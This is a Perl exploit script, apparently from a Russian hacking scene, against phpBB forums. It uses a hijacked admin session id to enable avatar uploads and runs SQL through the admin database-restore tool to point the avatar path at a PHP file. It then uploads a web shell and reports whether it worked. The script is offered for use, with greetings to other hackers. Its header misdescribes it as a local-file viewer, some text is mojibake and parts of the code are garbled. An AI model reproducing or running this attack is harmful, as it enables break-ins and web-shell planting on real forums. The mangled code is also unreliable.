#!/usr/bin/perl
if(@ARGV<3)
{
print "\nCoded by k1b0rg";
print "\nHow to use: perl sploit.pl http://localhost/phpbb13/ 37d2ed379a27ec6ede5978523b792a39 images/avatars/shell.php"; 
exit();
}
############################################################################
# How to use: perl phpbb3.pl http://loleg.ru/phpbb3/ admin 123456
# View local file in phpbb 3
# Coded by k1b0rg (768620)
# R3sP3Ct: antichat.ru,cup.su,netsec.ru,pyccxak.com,comp-info.ru. 
# ��� �� �������� ������ ���� �����, ������������� �������� ������ ���� �����. ��� �������������, �� ����� ������ ������� 
# �������� �����������, ���� ����� � �����.
# Greettzzzz: Egorich,׸ ������, snow,Zaco,limpompo,Rebz, Skvoznoy, mobile, sanyaX, �����, Daemoniz, Nova, m0nzt3r, ����, 
# ����, tutton, Trinux, Proteus, Psalm69, SladerNon (�� �� �����:DDDD).

#####################################################################
use LWP::UserAgent;

$site=$ARGV[0];
$admin_sid=$ARGV[1];
$put=$ARGV[2];
$browser = LWP::UserAgent->new() or die;
$res = $browser->post($site.'admin/admin_board.php?sid='.$admin_sid,
[
'allow_avatar_upload'=>'1',
'submit'=>'submit'
]);
$sql = 'UPDATE phpbb_config SET config_value=CONCAT(\''.$put.'\',CHAR(0)) where config_name=\'avatar_path\';';
&phpbb;_sql_query($site.'/admin/admin_db_utilities.php?sid='.$admin_sid,$sql);
$res = $browser->get($site.'profile.php?mode=editprofile&sid;='.$admin_sid);
$username=$1 if ($res->content=~/name="username" value="(.*?)"/);
$useremail=$2 if ($res->content=~/name="email"(.*?)value="(.*?)"/);
$userid=$1 if ($res->content=~/name="user_id" value="(\d+)"/);
$userlang=($res->content=~/<select name="language"><option value="(.*?)" m)?($1):('english'); $res="$browser-">post($site.'profile.php?sid='.$admin_sid,
Content_type =>'form-data',
Content      => [ 
'username'=>$username,
'email'=>$useremail,
'new_password'=>'',
'password_confirm'=>'',
'icq'=>'',
'aim'=>'',
'msn'=>'',
'yim'=>'',
'website'=>'',
'location'=>'',
'occupation'=>'',
'interests'=>'',
'signature'=>'',
'viewemail'=>'0',
'hideonline'=>'0',
'notifyreply'=>'0',
'notifypm'=>'0',
'popup_pm'=>'0',
'attachsig'=>'0',
'allowbbcode'=>'0',
'allowhtml'=>'0',
'allowsmilies'=>'0',
'language'=>$userlang,
'style'=>'1',
'timezone'=>'-12',
'dateformat'=>'D M d,Y g:ia',
'avatar'=>
			         [
                            undef,
                            'kiborg.gif',
                            Content_type =>'image/gif',
                            Content =>  '',
                           ], 
'avatarurl'=>'',
'avatarremoteurl'=>'',
'mode'=>'editprofile',
'agreed'=>'true',
'coppa'=>'0',
'user_id'=>$userid,
'current_email'=>$useremail,
'submit'=>'Submit'
]);
if($res->content=~/<b>Warning<\/b>:/)
{
syswrite STDOUT,"\n".'Admin avatar path remote: [ERROR]'; 
}
else
{
$res = $browser->get($site.'/'.$put); 
if($res->status_line=~/200/) { 
syswrite STDOUT, 'Upload shell:[YES]';
syswrite STDOUT, "\n".$site.'/'.$put; }
else
{
syswrite STDOUT, 'Upload shell:[NO]';
}
}

sub phpbb_sql_query($$){
my $res = $browser->post($_[0], 
Content_type => 'form-data',
Content      => [ 
                perform       => 'restore',
                restore_start => 'Start Restore',
                backup_file   => [ 
                                   undef,
                                   'fat', 
                                   Content_type => 'text/plain',
                                   Content => $_[1], 
                                 ],
                ]
);
}